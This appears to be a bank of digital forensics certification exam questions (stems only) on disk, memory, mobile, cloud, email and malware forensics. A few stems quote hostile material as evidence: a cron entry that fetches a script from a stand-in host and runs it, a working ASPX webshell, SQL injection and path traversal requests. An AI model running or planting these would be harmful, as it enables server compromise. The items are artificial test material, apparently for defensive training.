Hard196During a memory forensics analysis using Volatility, an examiner runs 'python vol.py -f memory.dmp pslist' and sees a suspicious process named 'expl0rer.exe' with a PPID of 4. What does a PPID of 4 indicate, and what should the examiner do next?
Hard197Which of the following is the PRIMARY purpose of using a write blocker in computer forensics?
Easy198Which THREE of the following are common challenges specific to cloud forensics? (Select THREE)
Hard199Which TWO of the following are common Linux log files that can be used for forensic analysis?
Easy200A network forensics analyst captures traffic and sees a series of TCP SYN packets sent to multiple ports on a target, with no corresponding SYN-ACK replies. What type of activity is MOST likely indicated?
Medium201According to Locard's exchange principle, which of the following is MOST relevant to digital forensics?
Easy202A forensic tool outputs a timeline of file system events. The analyst needs to correlate registry modifications with file creation times. Which tool is specifically designed for super timeline creation from multiple sources?
Hard203A malware analyst is performing static analysis on a packed executable. Which THREE techniques are effective for unpacking or analyzing packed malware? (Select THREE.)
Hard204In an ext4 file system, a forensic analyst needs to examine the journal to recover recently deleted files. Where is the journal typically stored?
Medium205An analyst discovers a suspicious file named 'cmd.aspx' in the uploads directory of an IIS web server. Analysis reveals the file contains code to execute system commands. What is this file most likely?
Medium206During a forensic investigation, you encounter a Windows system with an NTFS volume. The suspect claims they never used the recycle bin, but you find files in the $Recycle.bin folder. Which artifact can help you determine the original file path and deletion time?
Medium207A forensic lab in a shared office building must protect evidence against unauthorized physical access, environmental damage, and electromagnetic interference. The lab manager is documenting the physical controls for an accreditation audit. Which control best addresses the risk of an intruder removing a seized hard drive from the evidence room?
Medium208Which TWO of the following are challenges in SSD forensics compared to traditional HDD forensics? (Choose two.)
Hard209A security analyst observes a process making repeated network connections to an IP address 192.168.1.100 on TCP port 4444, and the process writes a DLL file to C:\Users\Public\. Which THREE actions should the analyst take immediately as part of dynamic analysis?
Hard210Which TWO of the following are challenges specific to SSD forensics compared to traditional HDD forensics?
Medium211A network analyst is reviewing a packet capture and sees a large number of TCP SYN packets sent to various ports on a single host from multiple source IPs. This pattern is most indicative of which type of attack?
Medium212Which THREE of the following are Windows Event IDs that are particularly useful for investigating account logon activities?
Medium213An email forensic analyst receives a suspicious email and wants to trace its origin. Which email header field provides the most reliable information about the IP address of the sending SMTP server?
Easy214Which TWO of the following are valid artifacts for determining program execution on a Windows system? (Select TWO.)
Medium215An examiner is analyzing an Android device using Cellebrite UFED. The device is locked with a PIN, and the examiner has no PIN. Which acquisition type should the examiner attempt FIRST to maximize data recovery without destroying evidence?
Medium216Which of the following is the BEST definition of computer forensics?
Easy217Which TWO tools are commonly used for static analysis of malware binaries?
Medium218A security analyst is investigating a containerized application running on a Docker host. The analyst needs to collect forensic evidence from a stopped container without starting it. Which of the following Docker commands should be used to export the container's filesystem as a tar archive?
Medium219During an investigation, an analyst uses `dd if=/dev/sdb of=evidence.img bs=4k conv=noerror,sync`. What is the purpose of the `conv=noerror,sync` option?
Hard220An organization in the UK suspects an employee of data theft. The IT manager wants to search the employee's company-issued laptop without consent. Which law primarily governs this action?
Hard221A forensic investigator is analyzing a compromised web server. In the Apache access logs, the investigator finds the following request: 'GET /images/../../../etc/passwd HTTP/1.1' with a 200 status code. Which of the following is the MOST likely reason the server returned a 200 (OK) response?
Hard222A forensic examiner is analyzing a RAID 5 array consisting of three disks. One disk has failed and is not available. The remaining two disks contain data and parity. Which technique can be used to reconstruct the missing disk's data and recover the original data?
Hard223Which tool is specifically designed for dynamic analysis of malware by executing it in a controlled, isolated environment and logging its behavior?
Easy224A forensic investigator is analyzing a Linux system that was compromised. The investigator needs to examine the file system for evidence of unauthorized access. The system uses the ext4 file system. Which TWO of the following file system artifacts can provide evidence of file creation, modification, or access times? (Choose two.)
Medium225A security analyst reviews Windows Event Logs and sees Event ID 4625 multiple times for a single user account from a remote IP address within a short time frame. What is the MOST likely interpretation?
Easy226Which file system uses a Master File Table ($MFT) as its central catalog for file metadata?
Easy227Which Linux log file is the primary source for authentication-related events, including SSH login attempts and sudo usage?
Easy228During an Android forensic examination, the analyst uses ADB to run 'adb shell dumpsys batterystats --reset' before acquiring data. What is the MOST likely purpose of this command?
Hard229An investigator needs to testify in court as an expert witness. Which of the following qualifications is MOST important for the court to accept their testimony?
Medium230A forensic investigator is examining a compromised Docker container on a Linux host. The investigator needs to collect volatile evidence from the running container before it is stopped. Which two actions should the investigator perform to capture the container's memory and running processes? (Choose two.)
Hard231Based on the log exhibit, what type of attack is occurring?
Easy232During a malware investigation, an analyst identifies a suspicious file that appears to be a Windows executable. Using PEiD, the analyst detects the file is packed with UPX. After unpacking, the analyst runs the file in a sandbox and observes it modifies the following registry key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\MalService. What behavioural indicator is primarily demonstrated?
Hard233During a forensic analysis of a compromised Linux server, you notice that the file /var/log/auth.log has been cleared. However, you find that the attacker's commands are still partially recoverable. Which artifact most likely contains the attacker's command history?
Medium234In Linux, which file contains hashed user passwords?
Easy235A security analyst reviewing Apache access logs finds entries like: 192.168.1.10 - - [12/Jan/2023:15:23:11 +0000] "GET /search?q=1' OR '1'='1 HTTP/1.1" 200 5324. What attack is indicated?
Medium236A network forensic analyst examines a pcap file in Wireshark and sees an HTTP POST request to '/shell.jsp' with a parameter 'cmd' containing 'dir'. The response contains a directory listing. Which intrusion artifact is indicated?
Hard237A forensic analyst is examining a Windows system and finds that the UserAssist key in the NTUSER.DAT hive contains entries with Rot13-encoded names. What is the primary purpose of the UserAssist key?
Hard238An Android forensic analyst connects a suspect device to their workstation and issues the command "adb backup -apk -shared -all -f backup.ab". Which type of acquisition is being performed?
Medium239A forensic investigator examines a hard drive and needs to recover deleted files. Which tool is specifically designed for file carving by scanning raw data for file headers and footers without relying on the file system?
Easy240Which tool is specifically designed for timeline analysis of forensic artifacts across multiple systems and can process output from various forensic tools?
Easy241In a UK-based investigation, which legal framework governs the search and seizure of digital evidence?
Medium242During a malware analysis, an analyst runs a suspicious executable in a Cuckoo Sandbox and observes that the process creates a mutex named 'Global\XPSS-1.0.0' and writes a registry key under HKCU\Software\Microsoft\Windows\CurrentVersion\Run. What do these actions MOST likely indicate?
Medium243A web server log shows the following request: 'GET /../../../../etc/passwd HTTP/1.1' with a 200 response code. The web server is running Apache on Linux. What attack has likely succeeded?
Medium244A company's legal department issues a legal hold notice for electronically stored information (ESI) related to a pending lawsuit. The IT department is tasked with preserving data. Which of the following actions is MOST likely to violate the legal hold requirements?
Hard245An investigator needs to capture network traffic from a live network segment without altering the traffic flow. Which technique should they use?
Easy246A CHFI analyst is called to investigate a suspected data breach. The IT team has already shut down the server. Which of the following is the most appropriate order of actions to preserve evidence?
Medium247An investigator is analyzing a Windows system and wants to find evidence of USB device usage. Which TWO registry keys should be examined? (Select TWO.)
Medium248An analyst suspects that sensitive data was hidden in the NTFS Alternate Data Streams (ADS) of a file on a suspect's drive. Which tool is specifically designed to enumerate and extract data from ADS on a live Windows system?
Medium249Which THREE of the following are challenges specific to SSD forensics compared to HDD forensics?
Hard250Which email header field is specifically used to verify that an email was not tampered with during transit and is signed by the sender's domain?
Easy251A forensic analyst is examining a hard drive that was imaged using a software write blocker. Which of the following is a potential disadvantage of using a software write blocker compared to a hardware write blocker?
Hard252In the context of e-discovery, what does the 'best evidence rule' require regarding digital documents?
Hard253A forensic analyst is performing static analysis of a Windows PE file. Which TWO of the following tools are specifically designed for static analysis of malware?
Easy254Which Windows artifact is primarily used to determine the execution history of applications, including the path and run count?
Easy255A security analyst is investigating a compromised Windows system and wants to see which processes were running at the time of memory capture. Which Volatility command should they use?
Medium256An analyst runs 'dcfldd if=/dev/sdb of=/evidence/disk.dd hash=sha256 hashlog=/evidence/hash.log' on a Linux system. What is the primary advantage of using dcfldd over plain dd for forensic imaging?
Hard257A security analyst is investigating a potential webshell on an IIS server. Which THREE artifacts are commonly associated with webshell presence?
Hard258An investigator needs to parse and analyze a Microsoft Outlook personal folders file (.pst). Which tool is specifically designed for this purpose?
Easy259An analyst detects a large amount of data being exfiltrated from a network over DNS queries. Which type of network analysis would BEST detect this activity?
Medium260Which THREE of the following are characteristics of the Master File Table ($MFT) in NTFS? (Choose three.)
Medium261An email forensic investigator examines a suspicious email and notices the following header: Received: from mail.evil.com (192.168.1.100) by mail.company.com. The DKIM-Signature header fails verification. What does this indicate?
Medium262After collecting digital evidence from a suspect's computer, the forensic examiner creates a forensic image using FTK Imager. The examiner then computes the MD5 hash of the original drive and the image file. Which of the following BEST describes the purpose of this hashing?
Medium263A forensic examiner needs to acquire an image of a suspect's laptop hard drive. The laptop is running, and the examiner wants to capture volatile data first. According to best practices, which order of steps should the examiner follow?
Medium264A Linux investigator wants to see all commands run by a user from the bash shell. Which file should be examined?
Medium265A forensic examiner is analyzing an iOS device backup and wants to extract the user's iCloud-related artefacts. Which TWO of the following are typical sources of iCloud artefacts in an iTunes backup?
Medium266An analyst is reviewing firewall logs and sees repeated outbound connections from an internal host to a known malicious IP on port 443. Which TWO network forensic data sources would BEST help determine if data exfiltration occurred?
Medium267Which Windows Registry hive contains user-specific configuration such as MRU lists and UserAssist artifacts?
Easy268Locard's exchange principle in digital forensics states that:
Easy269Which of the following principles states that when two objects come into contact, there is a transfer of material between them?
Easy270Which tool is specifically designed to acquire RAM from a Linux system for forensic analysis?
Easy271In Windows forensics, which artifact is used to track recently executed programs on a per-user basis?
Easy272A security analyst responds to a suspected data breach. The analyst documents the scene, photographs the computer, and labels the cables. Which phase of the forensic investigation process is being performed?
Medium273During a forensic investigation, an analyst creates a bit-for-bit copy of a suspect's hard drive using the 'dd' command with the following parameters: dd if=/dev/sda of=/evidence/image.dd bs=4k conv=noerror,sync. What is the purpose of 'conv=noerror,sync'?
Medium274Which TWO of the following are valid email header fields that can be used to detect email spoofing? (Select 2)
Easy275Which of the following BEST defines the chain of custody in digital forensics?
Easy276During a forensic investigation, an analyst discovers data hidden in the Host Protected Area (HPA) of a hard drive. Which tool is commonly used to view and access the HPA?
Medium277Which email header field is MOST reliable for identifying the true origin of an email, assuming no header tampering occurred at the initial MTA?
Easy278A forensic analyst finds a suspicious .plist file in /Library/LaunchDaemons/ on a macOS system. The file contains a key "ProgramArguments" with a path to a script in /tmp. Which persistence mechanism does this indicate?
Hard279Which TWO of the following are methods used to hide data within the NTFS file system?
Medium280A security analyst reviews firewall logs and sees repeated outbound connections from an internal server to an external IP on port 443. The server is not supposed to initiate outbound connections. Which action should the analyst take FIRST?
Medium281A forensic examiner needs to analyze the contents of a Windows prefetch file (.pf) to determine the last execution time of an application. Which tool would BEST accomplish this task?
Hard282Which principle states that every contact leaves a trace?
Easy283Which THREE of the following are indicators of a webshell on a compromised web server? (Select THREE.)
Hard284A forensic analyst is examining a Windows system for evidence of a program that runs automatically every time the system starts. Which registry key is commonly used to achieve persistence via the 'Run' key?
Medium285A security analyst runs a dynamic analysis of a suspected malware sample using Cuckoo Sandbox. The report shows that the sample created a mutex named 'Global\MyMaliciousMutex', added a registry run key under HKCU\Software\Microsoft\Windows\CurrentVersion\Run, and attempted to communicate with an IP address 185.10.68.12 on port 443. Which of the following is the BEST immediate indicator of compromise (IoC) to share with the threat intelligence team?
Hard286A forensic analyst is investigating a Windows system for evidence of USB device usage. Which registry key is MOST useful for determining the first time a USB device was connected and its serial number?
Medium287An investigator creates a forensic image using dcfldd with the following command: dcfldd if=/dev/sdb of=image.dd hash=sha256 hashwindow=10M hashlog=hash.txt. What is the effect of the 'hashwindow=10M' parameter?
Hard288A forensic analyst is examining a Windows system for evidence of USB device usage. Which TWO registry locations are known to store USB device history?
Medium289A forensic analyst needs to create a timeline of file system activity from a disk image. Which tool is specifically designed for this purpose and can parse various artifacts such as registry, prefetch, and log files?
Medium290During a forensic investigation, the first responder arrives at a scene where a computer is powered on and a user is logged in. Which of the following is the MOST appropriate initial action?
Easy291In network forensics, which tool is commonly used to analyze and visualize NetFlow data to identify network traffic patterns?
Easy292Which of the following is a unique challenge in cloud forensics compared to traditional digital forensics?
Easy293A forensic analyst needs to collect evidence from a running Windows system without altering the system state. Which tool should they use to acquire volatile memory?
Medium294An investigator needs to recover deleted files from a USB drive formatted with FAT32. Which of the following techniques would be most effective, assuming the files have not been overwritten?
Easy295A forensic analyst needs to acquire RAM from a live Linux system for memory analysis. Which tool is specifically designed for this purpose and can capture memory without rebooting?
Easy296A security analyst is reviewing firewall logs and notices repeated connection attempts from an internal IP to an external server on TCP port 4444. The internal host is a web server. What is the MOST likely explanation?
Medium297A malware analyst is performing static analysis on a suspicious PE file. Which TWO of the following are examples of anti-forensic techniques that the malware might use to hinder analysis? (Select TWO.)
Medium298During an iOS forensics investigation, an examiner wants to extract call history records from an iPhone backup. Which SQLite database file should be examined?
Easy299A forensic lab receives a sealed evidence bag containing a laptop seized during an investigation. The chain-of-custody form shows the bag was sealed at the scene by an officer. Before beginning analysis, the examiner must document the evidence. Which action best preserves the chain of custody at this point?
Hard300During a forensic examination of a solid-state drive (SSD), you notice that files deleted several months ago cannot be recovered using traditional file carving tools. Which SSD feature is MOST likely preventing recovery?
Hard301In a corporate investigation, legal counsel issues a litigation hold to preserve electronically stored information (ESI) relevant to a lawsuit. Which of the following is the BEST description of a litigation hold?
Medium302What is the primary goal of computer forensics?
Easy303In Windows registry forensics, which key is examined to identify USB devices that were connected to the system?
Medium304During a forensic examination, an analyst runs the following command: 'dd if=/dev/sda of=/mnt/evidence/image.dd bs=4k conv=noerror,sync'. The source drive has bad sectors. What is the effect of the 'conv=noerror,sync' option?
Hard305Which of the following is a key difference between static analysis and dynamic analysis in malware forensics?
Easy306During a cloud forensics investigation of an AWS environment, an analyst extracts CloudTrail logs and notices many events with the error code 'AccessDenied' for a specific IAM user attempting to list an S3 bucket. Which of the following is the most appropriate next step?
Medium307An analyst finds evidence that an attacker used steganography to hide data within image files on the suspect's computer. Which of the following tools is MOST appropriate for detecting steganography in these images?
Medium308In an Azure environment, a forensic analyst needs to identify which user assigned a specific role to another user, leading to privilege escalation. Which Azure log should the analyst examine?
Medium309During a cloud forensic investigation, the analyst discovers that the suspect used AWS IAM credentials to launch unauthorized EC2 instances. The suspect claims the credentials were stolen. Which log would the analyst examine to determine the source IP address from which the credentials were used?
Hard310A forensic analyst discovers an unusual entry in the Windows Registry under 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run'. Which persistence mechanism does this represent?
Medium311What is the primary purpose of maintaining a chain of custody during a forensic investigation?
Easy312Which tool is commonly used to analyze email headers and trace the path of an email across servers by parsing 'Received' fields?
Easy313An Android phone is seized, and the forensic examiner needs to acquire the device in a forensically sound manner. The phone is running Android 12 and has USB debugging enabled. Which acquisition method provides the most complete data without physically modifying the device?
Easy314A GCP audit log shows a project owner granted 'iam.serviceAccountUser' role to a service account from a different project. Which TWO potential security implications should the investigator prioritize?
Hard315A forensic analyst is testifying as an expert witness in court. The opposing counsel challenges the analyst's testimony based on the Frye standard. What does the Frye standard require for scientific evidence to be admissible?
Medium316An analyst retrieves a forensic image of a hard drive and discovers that the size reported by the operating system is smaller than the actual physical capacity. The extra space is not accessible through standard partition tools. This hidden area is MOST likely:
Hard317A forensic analyst is examining an Android device that was factory reset before seizure. Which Google account artefacts are MOST likely still recoverable from the device's storage?
Medium318Which of the following BEST describes the chain of custody in digital forensics?
Easy319A security analyst suspects malware infection on a Windows workstation. They run Process Monitor and observe that a process named 'svch0st.exe' creates a mutex named 'Global\Mutex_1234' and writes to the registry key 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run'. Which malware persistence mechanism is being used?
Medium320A malware analyst runs a suspicious executable in Cuckoo Sandbox. The report shows that the process created a mutex named 'Global\MyMalwareMutex'. What is the significance of this mutex?
Medium321During a forensic examination, an analyst uses Autopsy to view the contents of the Recycle Bin on a Windows 10 system. However, some files that were deleted by the user do not appear in the Recycle Bin. What is the MOST likely reason?
Medium322During incident response, a first responder discovers a compromised system with signs of an active command-and-control (C2) connection. What is the MOST important immediate action to preserve evidence and prevent further damage?
Medium323During an investigation, an analyst recovers a file from unallocated space that contains fragments of a deleted document. The file size is 512 bytes, but the cluster size of the volume is 4096 bytes. What is the term for the unused bytes between the end of the file and the end of the last cluster?
Medium324A malware analyst is examining a suspicious Windows executable that appears to be packed. During static analysis, the analyst notices that the PE file has a small number of imports, a high entropy in the .text section, and a section named UPX0. The analyst suspects the sample is packed with UPX. Which TWO of the following techniques would BEST allow the analyst to unpack the sample and continue analysis? (Choose two.)
Medium325A security analyst reviews the following Windows Event log entry: Event ID 4648 with logon type 3, subject user 'CONTOSO\admin', target server 'FS01', target user 'CONTOSO\backupadmin'. What does this event indicate?
Hard326An analyst is investigating a Linux server that suffered a data breach. The attacker deleted several log files. The analyst runs `debugfs /dev/sda1` and issues the command `lsdel`. What is the purpose of this command in the context of file recovery?
Hard327A first responder arrives at a suspected intrusion scene. A desktop computer is powered on and logged in. The user claims they saw suspicious files being copied to a USB drive. Which of the following should the first responder do FIRST?
Medium328A forensic analyst is examining a Windows system and finds a prefetch file named NOTEPAD.EXE-12345678.pf. What information can be gleaned from this artifact? (Select the BEST answer.)
Hard329During an incident response, an analyst finds the following entry in /etc/crontab: */5 * * * * root /bin/bash -c 'curl -s http://malicious.com/script.sh | bash'. What is the MOST likely purpose of this entry?
Medium330Which TWO of the following are essential components of chain of custody documentation?
Medium331What is the PRIMARY purpose of a chain of custody document in a forensic investigation?
Easy332An incident responder examines a Linux server and finds a suspicious cron job that runs every minute and executes a script located in /tmp. Which persistence technique does this represent?
Hard333Which of the following email headers is used to verify the domain of the sending server and is commonly used for authentication to prevent spoofing?
Medium334During a mobile forensic examination of an iPhone, the examiner wants to acquire the most data possible, including deleted files and unallocated space. Which acquisition type should be used?
Easy335An analyst examining Apache access logs finds the following entry: 192.168.1.10 - - [10/Oct/2023:13:55:36 -0400] "GET /search.php?q=1'%20OR%20'1'='1 HTTP/1.1" 200 5324 "-" "Mozilla/5.0". Which of the following attacks is MOST likely occurring?
Medium336A forensic investigator analyzing a RAID 5 array of three disks notices that one disk has failed. Can the investigator still reconstruct the data?
Hard337In a macOS forensic investigation, which log system provides a timeline of high-level system events such as application launches and user logins?
Easy338A forensic investigator is examining a compromised database server running Microsoft SQL Server 2019. The attacker gained access and executed several destructive queries. The investigator needs to determine the exact time and text of the malicious queries. The database is configured with the full recovery model, and transaction log backups are available. Which of the following should the investigator use to recover the query text?
Medium339An analyst performs forensic imaging using the command: dcfldd if=/dev/sda of=image.dd hash=sha256 hashlog=hash.txt bs=4096 conv=noerror,sync. What is the PRIMARY purpose of the 'hash=sha256' and 'hashlog=hash.txt' parameters?
Hard340In a Google Cloud Platform (GCP) environment, a forensic investigator needs to determine who deleted a Cloud Storage bucket and when. Which log type should be queried to obtain this information?
Hard341A forensic investigator is examining a Linux system compromised via a web application. Which THREE artifacts should the investigator prioritize to determine the attacker's entry point and post-exploitation activities?
Medium342A forensic examiner is analyzing an Android device that has been factory reset. Which artefact is MOST likely to persist after a factory reset, providing potential evidence of prior usage?
Medium343A forensic investigator uses the 'dd' command to create a forensic image. The original drive has a SHA-256 hash of a1b2c3... and the image produces the same hash. Which rule of evidence does this satisfy?
Medium344Which TWO of the following are tools commonly used for network forensics analysis? (Select two.)
Medium345A forensic analyst is examining browser history from a Chrome installation on a Windows system. Where is the Chrome history database typically stored?
Medium346A security analyst reviews Windows Security Event Log and finds multiple Event ID 4625 entries for a single user account within a few seconds. What does this pattern MOST likely indicate?
Easy347During a forensic acquisition of a suspect's SSD, the analyst notices that the drive supports TRIM. Which of the following is the most important consideration when acquiring the drive to preserve deleted data?
Medium348During a forensic analysis of an NTFS volume, an investigator finds a file that appears to be hidden. Which NTFS feature allows data to be stored in a file without affecting the file's visible size in the directory listing?
Easy349An analyst runs 'foremost -i disk.dd -o output' and recovers several JPEG files. However, some files are corrupted or incomplete. What is the most likely cause?
Medium350A Windows system has been compromised. The analyst finds a registry run key at HKCU\Software\Microsoft\Windows\CurrentVersion\Run with value name 'UpdateService' pointing to C:\Users\Public\svchost.exe. Why is this particularly suspicious?
Hard351An analyst suspects a Windows executable is packed. They run `strings` on the file and see few readable strings, and PEiD reports 'UPX 0.89.6 - 1.02 / 1.05 - 1.24'. Which static analysis technique should the analyst use NEXT to extract the original code?
Hard352In Docker forensics, which of the following commands would you use to inspect the history of an image, including the commands that created each layer?
Medium353In the context of the UK Police and Criminal Evidence Act (PACE), which of the following is a key requirement for the admissibility of digital evidence?
Medium354A security team is investigating a suspected Advanced Persistent Threat (APT) intrusion. They have identified several IoCs. Which THREE of the following are considered standard types of Indicators of Compromise?
Hard355A forensic investigator needs to analyze the keychain data from an iOS device backup. Which tool is specifically designed to decrypt and display iOS keychain contents?
Easy356An analyst examines the following Apache access log entry: 192.168.1.10 - - [10/Jan/2023:13:45:22 +0000] "GET /search.php?q=1%27%20UNION%20SELECT%201,2,3-- HTTP/1.1" 200 1234 "-" "Mozilla/5.0". Which attack is MOST likely indicated?
Easy357Which TWO of the following are indicators of a webshell on a web server? (Select TWO.)
Medium358A network forensic analyst is investigating a suspected data exfiltration incident. The analyst captures live traffic and wants to identify covert channels that might be used to transfer data out of the network. Which two of the following techniques are MOST likely to indicate a covert channel? (Choose two.)
Hard359During a forensic examination of a compromised Windows server, you find a registry key under HKLM\SYSTEM\CurrentControlSet\Services that points to a malicious DLL. Which event ID would have been generated when this service was installed?
Hard360A forensic examiner is analyzing a Mac system and wants to review system logs that record various activities, including application launches and kernel events. Which logging system on macOS should be examined?
Medium361An analyst identifies an unknown binary running on a Linux server. Which /proc filesystem entry would provide the command-line arguments used to start the process?
Medium362A Linux system administrator notices that the /var/log/auth.log file shows many 'Failed password for root' entries from a single IP address within a short timeframe. Which tool would BEST help the administrator block further access from that IP?
Medium363During an iOS forensic examination of an iCloud backup, an analyst finds that the SQLite database files for the Health app are encrypted. Which component is MOST likely responsible for encrypting this data, and what is required to decrypt it?
Hard364You are a forensic investigator responding to an incident at a financial institution. The organization uses Microsoft SQL Server 2016 for its transaction processing system. The database is configured with full recovery model and transaction log backups are taken every 15 minutes. The incident response team has identified that an attacker gained access to the database server via compromised credentials and executed a series of malicious SQL statements, including data exfiltration and deletion of critical records. The time of the attack is estimated to be between 2:00 PM and 2:05 PM. The last full backup was taken at 12:00 AM (midnight) the same day. Transaction log backups are available for the entire day. The last transaction log backup before the attack was taken at 1:45 PM. The next transaction log backup after the attack was taken at 2:15 PM. The database is still online and being used by the business. Management wants to recover the database to a point just before the attack (2:00 PM) to minimize data loss, while preserving evidence for investigation. Which of the following actions should you take FIRST?
Hard365A security analyst is reviewing output from a Cuckoo Sandbox analysis of a suspicious executable. The report shows that the process created a mutex named 'Global\GLOBAL_MUTEX_123' and modified the registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\. Which behavioral indicator is MOST evident?
Medium366A forensic examiner uses Oxygen Forensic Detective to acquire data from an Android device. The tool reports that it performed a 'full file system' extraction. Which of the following is a prerequisite for this type of extraction?
Medium367An organization uses Microsoft SQL Server 2019 with full recovery model. A database administrator accidentally executed a DROP TABLE statement. The transaction log was backed up immediately after the incident. Which forensic technique would allow the analyst to restore the dropped table?
Hard368Which file system journal is commonly used in Linux ext3/ext4 to record metadata changes before they are committed to the main file system?
Easy369An investigator extracts the SMS.db file from an iOS backup. Which table within this database would contain the actual message content for sent and received messages?
Medium370An investigator needs to acquire data from a suspect's hard drive without altering any data. Which tool is MOST appropriate to ensure write-blocking at the hardware level?
Medium371An organization receives a legal hold notice regarding pending litigation. The IT department is instructed to preserve all relevant electronically stored information. What is the primary action the IT department should take?
Medium372Which email header field is used to verify that an email was sent by the authorized mail server for the domain and has not been tampered with, using cryptographic signatures?
Easy373A forensic analyst is examining a Windows malware sample using static analysis. Which tool is BEST suited for viewing the PE header structure, including sections, imports, and exports?
Easy374A forensic analyst examining a Windows machine finds a suspicious service named 'SrvMon' installed. The System event log shows Event ID 7045 at the time of compromise. What does this event indicate?
Medium375Which TWO tools are specifically designed for file carving (recovering files based on signatures) and are commonly used in digital forensics?
Medium376During a forensic analysis of an SSD, the analyst encounters challenges due to TRIM and wear-leveling. Which TWO statements accurately describe the impact of these features on data recovery?
Hard377In Android forensics, which of the following acquisition methods provides the most complete and forensically sound image of the device's internal storage?
Easy378A security analyst reviews Windows Security Event Logs and finds multiple Event ID 4625 entries from a single source IP address targeting various usernames. Which type of attack is MOST likely occurring?
Medium379An investigator is analyzing a compromised MySQL database server. To determine the exact time and content of a suspect data exfiltration query, which MySQL log should be examined first, assuming it is enabled?
Medium380Which TWO of the following are typical sources of evidence for network forensics? (Select TWO.)
Easy381Which TWO of the following are appropriate techniques for identifying a webshell on a compromised web server?
Medium382During a forensic investigation of a Windows 10 system, you need to analyze the file system to recover deleted files. Which TWO file system artifacts would be most useful for this purpose?
Medium383An incident responder finds a suspicious LNK file in a user's Startup folder on a Windows system. The LNK file's target is "C:\Windows\System32\rundll32.exe" with a command-line argument "javascript:" followed by encoded text. What is the most likely purpose of this shortcut?
Medium384A security analyst reviews Windows Security Event Log and observes Event ID 4625 repeatedly for a single user account from a remote IP address within a short timeframe. What is the MOST likely cause?
Easy385Which file system artifact in NTFS is used to hide data by appending a stream to an existing file without affecting its primary data stream?
Easy386A malware analyst uses Cuckoo Sandbox to analyze a sample. The report shows that the sample sends HTTP POST requests to 'http://malicious.example.com/gate.php' with encrypted data. Which type of indicator of compromise (IoC) is this?
Medium387Which of the following BEST describes Locard's exchange principle as applied to digital forensics?
Easy388During a network forensic investigation, the analyst recovers a PCAP file. What type of information can be directly extracted from this file?
Easy389Which network forensic technique involves analyzing the flow of network traffic to identify patterns and anomalies, often using tools like SiLK or nfdump?
Medium390An analyst suspects that an attacker used a web shell to execute commands on a Windows web server. Which Windows event ID should the analyst look for to detect service installation that may have been used for persistence?
Medium391During a forensic investigation of a compromised web server, you find a file named 'cmd.aspx' in the uploads directory. The file contains: <%@ Page Language="C#" %><% Response.Write(System.Diagnostics.Process.Start("cmd.exe","/c "+Request.QueryString["cmd"])).StandardOutput.ReadToEnd(); %>. What is the most likely purpose of this file?
Hard392In an email header, an analyst notices the following: 'Received: from mail.attacker.com (192.168.2.100) by mail.victim.com (Postfix) with ESMTP id ABC123 for <user@victim.com>; ...'. The 'From' address appears as 'ceo@victim.com'. Which type of attack is most likely?
Hard393An email forensic analyst receives a suspicious email and examines the full headers. Which header field is the MOST reliable for determining the true originating IP address of the sender, assuming no spoofing of the header?
Easy394A Windows system's registry key 'HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR' contains a subkey with a serial number. What does this artifact indicate?
Hard395During a forensic investigation, you need to acquire the RAM of a running Linux system. Which tool is specifically designed for memory acquisition on Linux?
Medium396During a mobile forensics investigation, an examiner needs to acquire data from an iPhone running iOS 14. Which of the following acquisition methods provides the MOST complete data extraction?
Easy397Which of the following is a key requirement for digital evidence to be considered admissible in court?
Medium398In Android forensics, which command is used to extract a full physical image of a device's flash memory over USB using the Android Debug Bridge (ADB)?
Easy399Which THREE of the following are characteristics of the GPT (GUID Partition Table) compared to MBR?
Hard400Locard's exchange principle is fundamental to forensic science. How does this principle apply to computer forensics?
Easy401A forensic investigator is examining a Linux system and suspects that files were deleted to cover tracks. The investigator runs 'debugfs -R "lsdel" /dev/sda1' on an ext4 file system. The output shows several deleted inodes but does not include file names. What is the MOST likely reason for the missing file names?
Medium402A cloud forensic investigator is examining AWS CloudTrail logs for signs of unauthorized access to an S3 bucket. Which of the following CloudTrail event names would indicate a successful attempt to list the objects in the bucket?
Medium403During a forensic investigation of a Windows 10 system, you find that a suspect used the 'cipher /w:C:' command. What is the primary forensic implication of this action?
Hard404An analyst is investigating a compromised Linux system. Which file system structure holds metadata about every file and directory, including permissions, ownership, timestamps, and pointers to data blocks?
Easy405An IIS log entry shows: `2024-07-15 14:22:10 10.0.0.5 GET /../../windows/system32/cmd.exe 404 - Mozilla/5.0`. What attack technique does this log entry indicate?
Medium406A security analyst finds the following entry in the Apache access log: 10.0.0.5 - - [20/Jan/2023:08:12:44 +0000] "GET /../../../../etc/passwd HTTP/1.1" 404 345 "-" "curl/7.68.0". Which attack was attempted?
Medium407An investigator is analyzing a RAID 5 array consisting of three disks. One disk fails and is replaced. After rebuilding, the file system appears corrupted. What is the MOST likely cause?
Hard408A network analyst captures a packet with Wireshark showing a TCP SYN packet from IP 10.0.0.5 to 192.168.1.10 port 443, followed immediately by a SYN‑ACK from 192.168.1.10 to 10.0.0.5, then an RST from 10.0.0.5. What does this sequence MOST likely indicate?
Hard409During a forensic examination of a Windows system infected with ransomware, the analyst finds that the file timestamps (creation, modification, access) for several critical system files have been altered to match legitimate Windows files. Which anti-forensic technique is MOST likely being used?
Hard410A forensic investigator needs to collect evidence from a Google Cloud Platform (GCP) environment. Which of the following GCP services provides audit logs for administrative activities and data access?
Medium411In an ext4 file system, after a file is deleted, the inode's di_mode field is set to 0 and the block pointers are cleared. However, the file content may still be recoverable until what happens?
Medium412A forensic analyst is examining a FAT32 file system and finds that the file allocation table indicates a cluster chain ending with 0x0FFFFFFF. What does this value signify?
Easy413A forensics lab is preparing a new acquisition workstation for imaging suspect drives. The lab manager wants to ensure the workstation itself does not introduce evidence contamination or alter suspect media during imaging. Which two practices should be implemented? (Choose two.)
Medium414During an incident response, a first responder needs to collect volatile data from a compromised Windows 10 system. The system has PowerShell v5.1 available. Which PowerShell cmdlet should be used to capture a list of currently running processes with their associated command lines?
Hard415Which TWO of the following tools are primarily used for timeline analysis in digital forensics? (Select TWO.)
Medium416Which THREE of the following are commonly used for persistence on a Windows system? (Choose THREE.)
Hard417A forensic investigator finds a suspicious file named `cmd.aspx` in the web root of a compromised IIS server. The file contains code that accepts command input via HTTP GET parameters and executes it on the server. What is the MOST likely classification of this file?
Medium418During an investigation, a forensic analyst must preserve a hard drive that is part of a RAID array. Which of the following is the MOST appropriate method to preserve the evidence?
